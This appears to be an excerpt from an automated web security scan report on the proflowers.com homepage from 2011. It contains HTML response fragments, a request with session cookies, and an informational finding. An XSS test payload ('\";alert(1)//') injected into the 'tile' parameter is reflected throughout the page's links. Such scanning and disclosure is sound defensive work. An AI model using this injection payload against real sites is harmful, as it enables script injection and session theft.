eations.com/gifts/Graduation-Message-Frame-30021069?viewpos=5&amp;trackingpgroup=PHMPG03&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0055092b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Graduation Message Frame" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_8.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl2_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
tions.com/gifts/Heart-in-Sand-Framed-Print-30021311?viewpos=1&amp;trackingpgroup=PHMPG04&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Heart in Sand Framed Print" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_6.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
.personalcreations.com/gifts/Wedding-Crock-30020976?viewpos=2&amp;trackingpgroup=PHMPG04&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026339b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Wedding Crock" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-5_0.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ts/Wine-Inspired-Photography-Framed-Prints-30019837?viewpos=3&amp;trackingpgroup=PHMPG04&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Wine Inspired Photography Framed Prints" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_4.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
alcreations.com/gifts/Heart-Wedding-Canvas-30015295?viewpos=4&amp;trackingpgroup=PHMPG04&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008345X_49771_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Heart Wedding Canvas" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_8.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
tions.com/gifts/To-Have-and-To-Hold--Frame-30021347?viewpos=5&amp;trackingpgroup=PHMPG04&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000009D209_087948_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="To Have and To Hold Frame" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_6.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
onalcreations.com/gifts/Puzzle-Name-Stools-30012047?viewpos=1&amp;trackingpgroup=PHMPG05&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000001125X_023117_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Puzzle Name Stools" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
nalcreations.com/gifts/Baby-Alphabet-Quilt-30016554?viewpos=2&amp;trackingpgroup=PHMPG05&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Baby Alphabet Quilt" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_5.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ifts.personalcreations.com/gifts/Rag-Dolls-30016264?viewpos=3&amp;trackingpgroup=PHMPG05&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007G150X_68104_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Rag Dolls" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
.com/gifts/Upholstered-Rocker-with-Ottoman-30017015?viewpos=4&amp;trackingpgroup=PHMPG05&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Upholstered Rocker with Ottoman" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_8.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
sonalcreations.com/gifts/Pewter-Baby-Plate-30021404?viewpos=5&amp;trackingpgroup=PHMPG05&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009G877_92524_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Pewter Baby Plate" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_8.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
er Your Email Here
                   " id="_ctl12__ctl0_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" />
<img onclick="SetEmailEntryUrl()" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/personalcreations/images/Go_Btn.gif" alt="Sign Up for Email Savings" border="0" />
</div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="margin-left:5px;vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?Ref=HomeNoRef&amp;cobrand=pcr">My Account</a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?Ref=HomeNoRef&amp;cobrand=pcr">Order Tracking</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/Careers_Overview.aspx">Careers</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/privacy.aspx">Privacy & Security</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/terms.aspx">Terms Of Use</a>
...[SNIP]...
<li><a border="0" href="http://content.yudu.com/A1ribh/2011Spring2/resources/index.htm" target="_blank">View Catalog Online</a>
...[SNIP]...
<li><a href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_ApparelSizeCharts.pdf" target="_blank">Apparel Size Charts</a>
...[SNIP]...
<li><a href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_Ringsize.pdf" target="_blank">Ring Size Charts</a>
...[SNIP]...
</p>
<a title="The freshest flowers, guaranteed to last at least 7 days." border="0" rel="nofollow" href="http://www.proflowers.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:35px;width:120px;"><img class="footerLogo_PFC" height=35px width=120px class="footerLogo_PFC" height="35px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." border="0" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:35px;width:110px;"><img class="footerLogo_PLA" height=35px width=110px class="footerLogo_PLA" height="35px" width="110px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" /></a> <a title="International flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:35px;width:128px;"><img class="footerLogo_PFCint" height=35px width=128px class="footerLogo_PFCint" height="35px" width="128px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" border="0" /></a>
<a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:35px;width:151px;"><img class="footerLogo_RED" height=35px width=151px class="footerLogo_RED" height="35px" width="151px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." border="0" /></a>
<a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:35px;width:160px;"><img class="footerLogo_CMF" height=35px width=160px class="footerLogo_CMF" height="35px" width="160px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" /></a>
...[SNIP]...
zed gifts for life...s special occasions." border="0" href="http://www.personalcreations.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:35px;width:177px;"><img class="footerLogo_PCR" height="35px" width="177px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." border="0" /></a>
<a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:35px;width:83px;"><img class="footerLogo_SHB" height=35px width=83px class="footerLogo_SHB" height="35px" width="83px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." border="0" /></a>
...[SNIP]...
<div class="OtherBrands XSmallSize">
           Other Liberty Media Brands and Services:
           <a id="_ctl12__ctl0_FooterLink_berries" href="http://www.berries.com">Hand-Dipped Strawberries</a>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<br/><a class="Underlined" onclick="" href="http://www.facebook.com/personalcreations">Personal Creations Facebook</a><br/><a class="Underlined" onclick="" href="http://twitter.com/pcgifts">Personal Creations Twitter</a><br/><a class="Underlined" onclick="" href="http://www.linkedin.com/company/personal-creations">Personal Creations Linked-In</a>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
16.29. http://www.proflowers.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fdefault.aspx%25253Ftile%25253Dhmpg_hero16c36a%2525255c%25252522%2525253balert(1)%2525252f%2525252fdecb137eb0b%252526Ref%25253DHo%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:17:43 GMT
Content-Length: 95799


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
<p>
   1) Enable Javascript. To find out how: <A href="https://www.google.com/support/adsense/bin/answer.py?answer=12654" target="_blank">click here</a>
...[SNIP]...
<head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_common.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_default.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
<meta name="msvalidate.01" content="77940E049C181974C3AA656C72688B4C" />


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="innerContainer">
                    <link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="personalCreationLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="cherryMoonFarmsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<a id="_ctl18__homeLink" border="0" title="Go to ProFlowers Homepage" href="http://www.proflowers.com/sitemap.aspx?Ref=HomeNoRef"><img class="PFLogo" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers Delivery - Send Flowers, Gifts, and Plants" border="0" /></a>
...[SNIP]...
<li><a class="headerLink" href="http://www.bridesign.com" target="_blank">Wedding</a>
...[SNIP]...
<div class="rushDeliveryBox StandardSize">Need it <a id="_ctl18__ctl91__repeater__ctl0__pcHyperLink" rel="nofollow" href="http://www.floristexpress.net?refcode=XSD&amp;RefPage=PFC_Landing_Home" target="_blank">Today</a>
...[SNIP]...
<a href="http://www.proflowers.com/radio/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef&amp;how=home"><img class="RadioIcon_Control" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="ProFlowers on the Radio" border="0" /></a>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</a> <a class="Lckdwn3_Nav_PFC_Mothers_Show" href="http://www.floristexpress.net?pfc=1&amp;refcode=MDN&amp;LinkLocation=NavBar">Mother's Day</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Occasion_Show"><a class="mothersDay" href="http://www.floristexpress.net?pfc=1&amp;refcode=OMD&amp;LinkLocation=NavBar">Mother's Day - 5/8</a>
...[SNIP]...
